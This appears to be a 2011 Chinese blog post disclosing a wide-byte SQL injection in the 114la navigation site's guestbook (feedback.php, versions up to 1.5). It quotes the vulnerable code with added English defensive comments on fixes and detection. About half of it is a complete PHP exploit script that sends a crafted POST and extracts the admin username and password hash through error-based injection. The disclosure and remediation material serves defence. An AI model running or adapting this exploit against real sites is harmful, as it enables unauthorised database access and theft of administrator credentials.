
114啦网址导航留言本注入及修复

发布于:2011-07-26 22:26

图片:qq截图20110726221924.png

漏洞文件:feedback/feedback.php
  影响版本:<= 1.5
  // Excerpt of feedback/feedback.php (versions <= 1.5) as quoted in the post.
  // These statements sit inside an enclosing try block whose start, and the
  // initialisation of $error_msg, are not shown here.
  //
  // Input handling: each POST field is converted from UTF-8 to GBK with iconv().
  // The only filtering applied afterwards is strip_tags()/htmlspecialchars(),
  // which are HTML escapers, not SQL escapers, and nothing between these
  // conversions and the app_db::insert() call below escapes the values for SQL.
  // The post reports a wide-byte injection through this conversion.  The fix
  // belongs at the database boundary: set the connection charset to GBK and use
  // a charset-aware escaper, or better, prepared statements, so the converted
  // bytes are never spliced into SQL text.
  $username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
  $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
  $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
  // NOTE(review): as quoted this line is garbled; it presumably read
  // `if (empty($content)) $error_msg .= ...` in the original -- confirm against the file.
  (empty($content)) ;; $error_msg .= ',意见及建议';
  if (!empty($error_msg))
  {
  throw new Exception($error_msg, 11);
  }
  // HTML-escapes $content for later display.  This does not make it safe for SQL.
  $content = htmlspecialchars($content, ENT_QUOTES);
  // strlen() counts bytes; $content is GBK at this point, so 40-600 bytes is
  // roughly the 20-300 characters the message quotes.  The check runs after
  // htmlspecialchars(), so the expanded entities count toward the limit.
  if (strlen($content) > 600 || strlen($content) < 40)
  {
  throw new Exception('请将您的描述控制在  20 - 300 字,更多内容请您分次提交。', 1);
  }
  // Submission-count check.  The counter is read from a client-supplied cookie,
  // so this is a courtesy limit, not a security control: a client that simply
  // omits the cookie is never throttled.
  $old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
  if ($old_cookie >= SUBMIT_ONE_DAY)
  {
  throw new Exception('抱歉,24 小时内您只能提交  ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
  }
  $old_cookie++;
  // The converted, unescaped values go straight into the insert (per the post,
  // app_db::insert() does not escape them either).
  if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
  array($username, $email, $content, time())))
  {
  throw new Exception('抱歉,信息提交失败,请重试。', 1);
  }
  else
  {
  // Record the submission count.
  // The timestamp cookie is written as 'dfstime' but read as 'fdstime' (here
  // and in the else branch), so !isset($_COOKIE['fdstime']) is always true and
  // the else branch is unreachable: the fdnum cookie's expiry is renewed on
  // every submission instead of being anchored to the first one.
  if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
  {
  setcookie('dfstime', time(), time() + 86400);
  setcookie('fdnum', $old_cookie, time() + 86400);
  }
  else
  {
  setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
  }
  // Success is also signalled by throwing (code 3), so the unset() below never runs.
  throw new Exception('<div class="success">提交成功,感谢您的反馈!<a href="'. URL .'/">返回首页www.atcpu.com</a></div>', 3);
  unset($username, $email, $content);
  }
  $username、$email、$content 被强制转换为 GBK 编码,但均未经过滤就直接 insert;构造 UTF-8 宽字符即可形成宽字符注入。- 低调求发展
  EXP
  <?php
  // Proof-of-concept script attached to the post, kept byte-for-byte as quoted
  // (including extraction artefacts).  It sends a single crafted POST to
  // feedback/feedback.php and then looks for a MySQL 'Duplicate entry' error in
  // the HTTP response body.
  //
  // Defender's reading: the script depends on two separate defects.  The first
  // is the unescaped GBK-converted insert in feedback.php.  The second is that
  // raw database error text reaches the HTTP client; with error display turned
  // off and errors logged server-side instead, the response parsing at the end
  // of this script finds nothing.  Both should be fixed.
  // Detection: a POST to feedback.php whose form fields contain a quote
  // character and SQL keywords, and/or a response body containing
  // 'Duplicate entry', are both worth alerting on in web-server and WAF logs.
  $sbcopyright='
  ----------------------------------------
  114la feedback injection Vul Exploit
  By xZL
  Team: oke
  2011.04.02
  Usage: php '.$argv[0].' host /path
  Example: php '.$argv[0].' 127.0.0.1 /
  ----------------------------------------
  ';
  // Requires a host and a path argument; otherwise prints the banner and exits.
  if ($argc < 3) {
  print_r($sbcopyright);
  die();
  }
  ob_start();
  $url = $argv[1];
  $path= $argv[2];
  // Plain TCP connection on port 80; the request is written by hand below.
  $sock = fsockopen("$url", 80, $errno, $errstr, 30);
  if (!$sock) die("$errstr ($errno) ");
  // Form body as posted; the username field carries the injection, which is
  // why that field (and the others) must be escaped after charset conversion.
  $data = "username=0kee%E7%B8%97';email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#;content=~~~~~this is a test from 0kee security team~~~~~";
  fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1 ");
  fwrite($sock, "Accept: */* ");
  fwrite($sock, "Referer: http://$url/#M ");
  fwrite($sock, "Accept-Language: zh-cn ");
  fwrite($sock, "Content-Type: application/x-www-form-urlencoded ");
  fwrite($sock, "Accept-Encoding: gzip, deflate ");
  fwrite($sock, "User-Agent: Mozilla ");
  fwrite($sock, "Host: $url ");
  fwrite($sock, "Content-Length: ".strlen($data)." ");
  fwrite($sock, "Connection: Keep-Alive ");
  fwrite($sock, "Cache-Control: no-cache ");
  fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON ");
  fwrite($sock, $data);
  // Reads response headers up to the first blank line, then the whole body.
  $headers = "";
  while ($str = trim(fgets($sock, 4096)))
  $headers .= "$str ";
  echo " ";
  $body = "";
  while (!feof($sock))
  $body .= fgets($sock, 4096);
  fclose($sock);
  // Only succeeds when the server leaks the MySQL error message verbatim.
  if (strpos($body, 'Duplicate entry') !== false) {
  preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
  $result=explode("_",$arr[1]);
  print_r("Exploit Success! username:".$result[0]." password:".$result[1]." Good Luck!");
  }else{
  print_r("Exploit Failed! ");
  }
  ob_end_flush();
  ?>

